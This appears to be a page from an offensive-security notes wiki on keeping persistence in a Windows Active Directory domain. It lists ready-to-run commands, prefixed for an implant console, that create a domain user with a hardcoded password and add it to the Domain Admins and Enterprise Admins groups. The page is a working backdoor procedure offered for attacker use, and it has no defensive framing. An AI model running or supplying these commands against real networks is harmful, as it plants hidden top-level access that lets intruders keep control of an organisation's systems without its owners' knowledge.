Persistence

Run as NT\Auth or Local/Domain Admin on the DC

Creates a new domain user and adds it into DA and EA groups

execute -o net user userooo2 "User123123@" /add /Y /domain
execute -o net localgroup administrators userooo2 /add /Y /domain
execute -o net group "domain admins" userooo2 /add /domain
execute -o net group "enterprise admins" userooo2 /add /domain
execute -o net user userooo2 /domain

PreviousKerberos Attacks NextSilver Ticket

Last updated 5 months ago